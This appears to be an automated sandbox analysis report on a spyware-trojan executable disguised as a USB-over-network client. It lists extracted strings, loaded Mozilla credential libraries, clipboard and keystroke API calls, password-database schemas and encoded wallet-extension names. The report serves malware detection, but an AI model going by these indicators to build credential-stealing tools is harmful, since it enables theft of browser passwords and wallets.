Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 4c469e2cf403fea6249e835ddce23de2.exe, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: 4c469e2cf403fea6249e835ddce23de2.exe, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://ocsp.digicert.com0H
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://ocsp.digicert.com0I
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 4c469e2cf403fea6249e835ddce23de2.exe, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961950084.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://www.usb-over-network.com
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://www.usb-over-network.com/usb-over-network-purchase.html?rf=usbnetclient&ver=6.0.6
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: http://www.usb-over-network.com?rf=usbnetclient&ver=6.0.6usbclienthelp.chmhttp://www.usb-over-networ
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: FHDAFIID.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: FHDAFIID.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FHDAFIID.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, FHDAFIID.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1856393470.0000000022779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1856393470.0000000022779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17381
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: 4c469e2cf403fea6249e835ddce23de2.exe, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: FHDAFIID.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1958323593.0000000028862000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp, BAEBGCFIEHCFIDGCAAFB.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: FHDAFIID.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1920372324.0000000028988000.00000004.00000020.00020000.00000000.sdmp, EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1920372324.0000000028988000.00000004.00000020.00020000.00000000.sdmp, EGCBFIEHIEGCAAAKKKKEGDHJDH.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009BE140 OpenClipboard,WideCharToMultiByte,_free,_free,SetLastError,_free,_free,_free,_free, 0_2_009BE140
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009BE0A0 GetClipboardData,GlobalLock,_malloc,GlobalUnlock,CloseClipboard,_free, 0_2_009BE0A0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B6150 GetKeyState,SendMessageW,IsRectEmpty,GetClientRect,InvalidateRect,InvalidateRect,InvalidateRect,UpdateWindow,IsRectEmpty,GetAsyncKeyState,SendMessageW, 0_2_009B6150
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 00B1B8D7 appears 96 times
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 6C8C09D0 appears 126 times
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 6C769B10 appears 34 times
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: String function: 6C763620 appears 38 times
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: invalid certificate
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1937567224.000000000146D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameusbclient.exef# vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962400260.000000006C915000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962537959.000000006F8F2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe Binary or memory string: OriginalFilenameusbclient.exef# vs 4c469e2cf403fea6249e835ddce23de2.exe
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009D3E30 __snprintf,_memset,GetVersionExW,GetLastError,_memset,FormatMessageW,SendMessageW, 0_2_009D3E30
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CFEC0 _memset,GetVersionExW,CoInitializeEx,CreateEventW,CreateEventW,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,__beginthreadex,CloseHandle,CoCreateInstance, 0_2_009CFEC0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A6C0D8 LockResource, 0_2_00A6C0D8
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NHEHMOPV.htm Jump to behavior
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000003.1859335907.000000002274E000.00000004.00000020.00020000.00000000.sdmp, KFCBAEHCAEGDHJKFHJKF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 4c469e2cf403fea6249e835ddce23de2.exe ReversingLabs: Detection: 13%
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: </LAUNCH_ICON>
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: </LAUNCH_BTN>
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: uxtheme.dll
